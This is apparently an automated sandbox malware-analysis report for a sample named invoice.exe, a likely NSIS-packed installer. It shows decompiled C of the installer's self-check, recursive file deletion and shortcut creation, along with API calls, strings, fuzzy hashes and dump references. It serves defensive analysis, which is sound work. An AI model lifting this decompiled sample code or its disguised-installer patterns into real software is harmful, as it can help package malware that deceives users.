SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052AE
SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C1
SendMessageA.USER32(?,00001026,00000000,?), ref: 004052CF
SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E2
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405304
ShowWindow.USER32(?,00000008), ref: 00405318
GetDlgItem.USER32(?,000003EC), ref: 00405339
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405349
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405362
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040536E
GetDlgItem.USER32(?,000003F8), ref: 00405247

Part of subcall function 0040405B: SendMessageA.USER32(00000028,?,?,00403E8B), ref: 00404069

GetDlgItem.USER32(?,000003EC), ref: 0040538A
CreateThread.KERNEL32(00000000,00000000,Function_0000515E,00000000), ref: 00405398
CloseHandle.KERNELBASE(00000000), ref: 0040539F
ShowWindow.USER32(00000000), ref: 004053C2
ShowWindow.USER32(?,00000008), ref: 004053C9
ShowWindow.USER32(00000008), ref: 0040540F
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405443
CreatePopupMenu.USER32 ref: 00405454
AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 00405469
GetWindowRect.USER32(?,000000FF), ref: 00405489
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A2
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054DE
OpenClipboard.USER32(00000000), ref: 004054EE
EmptyClipboard.USER32 ref: 004054F4
GlobalAlloc.KERNEL32(00000042,?), ref: 004054FD
GlobalLock.KERNEL32(00000000), ref: 00405507
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040551B
GlobalUnlock.KERNEL32(00000000), ref: 00405534
SetClipboardData.USER32(?,00000000), ref: 0040553F
CloseClipboard.USER32 ref: 00405545

Strings

Yllerion Setup: Installing, xrefs: 004054BA

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: Yllerion Setup: Installing
API String ID: 590372296-2322757991
Opcode ID: e9cc725ee0651f9e3bb7bb627a473a378111f32a2011408fb0017e783986cbfa
Instruction ID: ba98567820032f63b871bd6861c5d6e43a3521a54ecc658c1b1e5281d96d67ec
Opcode Fuzzy Hash: e9cc725ee0651f9e3bb7bb627a473a378111f32a2011408fb0017e783986cbfa
Instruction Fuzzy Hash: D6A14971900608BFDF11AF61DE89AAF7F79EB04354F40403AFA41B61A0CB755E519F68

Uniqueness

Uniqueness Score: -1.00%

Function 00402D48 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402D48(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\Arthur\\Desktop\\invoice.exe";
				 *0x42f410 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Arthur\\Desktop\\invoice.exe", 0x400);
				_t89 = E00405AFE(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\Arthur\\Desktop";
				E00405F65("C:\\Users\\Arthur\\Desktop", _t91);
				E00405F65(0x437000, E00405944(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42142c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402CE4("true");
					__eflags =  *0x42f418 - _t82;
					if( *0x42f418 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004031A9( *0x42f418 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402F81(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42f414 = _t94;
							 *0x42f41c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f420 =  *0x42f420 + 1;
								__eflags =  *0x42f420;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, "true"); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405AB9(0x42f440, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004031A9( *0x415420);
					_t65 = E00403193( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f418) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403193(0x421430, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402CE4("true");
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42f418;
						if( *0x42f418 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402CE4(0);
							}
							goto L20;
						}
						E00405AB9( &_v44, 0x421430, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x415420; // 0xd02b5
						 *0x42f4c0 =  *0x42f4c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42f418 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a194
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42142c; // 0xd24e8
						if(__eflags < 0) {
							_v12 = E004063B4(_v12, 0x421430, _t90);
						}
						 *0x415420 =  *0x415420 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402d50
0x00402d53
0x00402d56
0x00402d59
0x00402d5f
0x00402d70
0x00402d75
0x00402d88
0x00402d8d
0x00402d90
0x00402d96
0x00000000
0x00402d98
0x00402da3
0x00402da9
0x00402dba
0x00402dc1
0x00402dc7
0x00402dc9
0x00402dce
0x00402dd0
0x00402ebd
0x00402ebf
0x00402ec4
0x00402ecb
0x00000000
0x00000000
0x00402ecd
0x00402ed0
0x00402ef4
0x00402ef9
0x00402eff
0x00402f0a
0x00402f0f
0x00402f12
0x00402f13
0x00402f14
0x00402f16
0x00402f1b
0x00402f1e
0x00402f31
0x00402f35
0x00402f3d
0x00402f42
0x00402f44
0x00402f44
0x00402f44
0x00402f4c
0x00402f4c
0x00402f4f
0x00402f50
0x00402f50
0x00402f53
0x00402f55
0x00402f55
0x00402f55
0x00402f5f
0x00402f65
0x00402f73
0x00402f78
0x00000000
0x00402f78
0x00000000
0x00402f1e
0x00402ed8
0x00402ee3
0x00402ee8
0x00402eea
0x00000000
0x00000000
0x00402eef
0x00402ef2
0x00000000
0x00000000
0x00000000
0x00402dd6
0x00402ddb
0x00402de0
0x00402de4
0x00402deb
0x00402df0
0x00402df2
0x00402df4
0x00402df4
0x00402df8
0x00402dfd
0x00402dff
0x00402f29
0x00402f20
0x00000000
0x00402f20
0x00402e05
0x00402e0c
0x00402e88
0x00402e8c
0x00402e90
0x00402e95
0x00000000
0x00402e8c
0x00402e15
0x00402e1a
0x00402e1d
0x00402e22
0x00000000
0x00000000
0x00402e24
0x00402e2b
0x00000000
0x00000000
0x00402e2d
0x00402e34
0x00000000
0x00000000
0x00402e36
0x00402e3d
0x00000000
0x00000000
0x00402e3f
0x00402e46
0x00000000
0x00000000
0x00402e48
0x00402e4e
0x00402e57
0x00402e5d
0x00402e60
0x00402e62
0x00402e68
0x00000000
0x00000000
0x00402e6e
0x00402e72
0x00402e7a
0x00402e7a
0x00402e7d
0x00402e7d
0x00402e80
0x00402e82
0x00402e84
0x00402e84
0x00000000
0x00402e82
0x00402e74
0x00402e78
0x00000000
0x00000000
0x00000000
0x00402e96
0x00402e96
0x00402e9c
0x00402ea8
0x00402ea8
0x00402eab
0x00402eb1
0x00402eb3
0x00402eb3
0x00402ebb
0x00402ebb
0x00000000
0x00402ebb

APIs

GetTickCount.KERNEL32 ref: 00402D59
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\invoice.exe,00000400), ref: 00402D75

Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\invoice.exe,80000000,00000003), ref: 00405B02
Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B24

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\invoice.exe,C:\Users\user\Desktop\invoice.exe,80000000,00000003), ref: 00402DC1

Strings

Null, xrefs: 00402E3F
Error launching installer, xrefs: 00402D98
C:\Users\user\AppData\Local\Temp\, xrefs: 00402D4F
C:\Users\user\Desktop\invoice.exe, xrefs: 00402D5F, 00402D6E, 00402D82, 00402DA2
C:\Users\user\Desktop, xrefs: 00402DA3, 00402DA8, 00402DAE
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F20
"C:\Users\user\Desktop\invoice.exe", xrefs: 00402D48
$, xrefs: 00402DC9
soft, xrefs: 00402E36
Inst, xrefs: 00402E2D

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\invoice.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\invoice.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$$
API String ID: 4283519449-1508458362
Opcode ID: 7ea76b1eabee36cc462c4becf9ee5f087804ecb308710c36f18c8c35563ccf84
Instruction ID: b7ea9236aecaa86e611592eb70b2ed5589fa10121b1bd9207fea2451aa196312
Opcode Fuzzy Hash: 7ea76b1eabee36cc462c4becf9ee5f087804ecb308710c36f18c8c35563ccf84
Instruction Fuzzy Hash: 9D51F431A00215ABDB20AF64DE89B9F7BB8FB14358F50413BE504B72D1C7B88D858B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040572D Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040572D(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E004059EB(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4a8 =  *0x42f4a8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405F65(0x42b878, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405944(_t73);
					} else {
						lstrcatA(0x42b878, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b878,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405928( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00405F65(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004056E5(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040508C(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4a8 =  *0x42f4a8 + 1;
										} else {
											E0040508C(0xfffffff1, _t73);
											E00405D44(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040572D(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b878 - 0x5c;
					if( *0x42b878 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406268(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E004058FD(_t73);
							_t40 = E004056E5(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040508C(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040508C(0xfffffff1, _t73);
							return E00405D44(_t72, _t73, 0);
						}
						L33:
						 *0x42f4a8 =  *0x42f4a8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x00405737
0x0040573c
0x00405745
0x00405748
0x00405750
0x00405753
0x00405756
0x0040575e
0x00405760
0x00405761
0x00000000
0x00405761
0x0040576c
0x0040576f
0x0040576f
0x0040576f
0x00405773
0x00405786
0x0040578d
0x00405792
0x00405796
0x004057a6
0x00405798
0x0040579e
0x0040579e
0x004057ab
0x004057ae
0x004057b9
0x004057bf
0x004057c4
0x004057d4
0x004057d6
0x004057dc
0x004057df
0x004057e2
0x0040589a
0x0040589a
0x0040589e
0x004058a0
0x004058a0
0x004058a0
0x004058a0
0x00000000
0x00000000
0x00000000
0x00000000
0x004057e8
0x004057e8
0x004057f1
0x004057f7
0x004057fc
0x004057ff
0x00405801
0x00405805
0x00405807
0x00405807
0x00405805
0x0040580a
0x0040580d
0x00405820
0x00405822
0x00405827
0x0040582e
0x00405849
0x0040584e
0x00405850
0x00405874
0x00405852
0x00405852
0x00405855
0x00405869
0x00405857
0x0040585a
0x00405862
0x00405862
0x00405855
0x00405830
0x00405836
0x00405838
0x0040583e
0x0040583e
0x00405838
0x00000000
0x0040582e
0x0040580f
0x00405812
0x00405814
0x00000000
0x00000000
0x00405816
0x00405818
0x00000000
0x00000000
0x0040581a
0x0040581e
0x00000000
0x00000000
0x00000000
0x00405879
0x00405883
0x00405889
0x00405889
0x00405894
0x00000000
0x00405894
0x004057b0
0x004057b7
0x00000000
0x00000000
0x00000000
0x00405775
0x00405775
0x00405777
0x004058a4
0x004058a6
0x004058a9
0x004058fa
0x004058fa
0x004058fa
0x004058ab
0x004058ae
0x004058b9
0x004058be
0x004058c0
0x00000000
0x00000000
0x004058c3
0x004058cf
0x004058d4
0x004058d6
0x00000000
0x004058f1
0x004058d8
0x004058db
0x00000000
0x00000000
0x004058e0
0x00000000
0x004058e7
0x004058b0
0x004058b0
0x00000000
0x004058b0
0x0040577d
0x00405780
0x00000000
0x00000000
0x00000000
0x00405780

APIs

DeleteFileA.KERNELBASE(?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405756
lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040579E
lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057BF
lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057C5
FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D6
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405883
FindClose.KERNEL32(00000000), ref: 00405894

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040573A
\*.*, xrefs: 00405798
"C:\Users\user\Desktop\invoice.exe", xrefs: 0040572D

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\invoice.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-4262360876
Opcode ID: f7f96faad53d03e1b16e49c91bcd31d62ded0bd436c9b9e205275b97677bab50
Instruction ID: 2a0351abb2716448ee460da7bfccfa5d3c7c3698b554042fcfc8e424752a7a40
Opcode Fuzzy Hash: f7f96faad53d03e1b16e49c91bcd31d62ded0bd436c9b9e205275b97677bab50
Instruction Fuzzy Hash: 2551B132900A04AAEF217B268C45FBF7A78DF42754F14817BF841B61D1D73C8952DEA9

Uniqueness

Uniqueness Score: -1.00%

Function 004020CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004020CB() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x3c) = E00402AC1(0xfffffff0);
				 *(_t111 - 0xc) = E00402AC1(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x80)) = E00402AC1(2);
				 *((intOrPtr*)(_t111 - 0x7c)) = E00402AC1(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402AC1(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x88) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x78) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E0040596A( *(_t111 - 0xc)) == 0) {
					E00402AC1(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408514, _t87, "true", 0x408504, _t59); // executed
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408524, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository\\Diskofils\\Justiciaryship");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x78));
						_t95 =  *((intOrPtr*)(_t111 - 0x7c));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x80)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x34)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x3c), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), "true");
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x004020d4
0x004020de
0x004020e8
0x004020f2
0x004020fd
0x00402100
0x0040211a
0x00402120
0x00402126
0x00402129
0x00402133
0x00402137
0x00402137
0x0040213c
0x0040214d
0x00402155
0x0040222e
0x0040222e
0x00402235
0x0040215b
0x0040215b
0x0040216a
0x0040216e
0x00402171
0x00402177
0x00402185
0x00402188
0x0040218a
0x00402195
0x00402195
0x0040219a
0x0040219c
0x004021a3
0x004021a3
0x004021a6
0x004021af
0x004021b2
0x004021b7
0x004021b9
0x004021c6
0x004021c6
0x004021c9
0x004021d2
0x004021d5
0x004021de
0x004021e4
0x004021eb
0x00402204
0x00402206
0x00402214
0x00402214
0x00402204
0x00402217
0x0040221d
0x0040221d
0x00402220
0x00402226
0x0040222c
0x00402241
0x00000000
0x00000000
0x00000000
0x0040222c
0x00402237
0x00402954
0x00402960

APIs

CoCreateInstance.OLE32(00408514,?,?,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship, xrefs: 0040218D

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
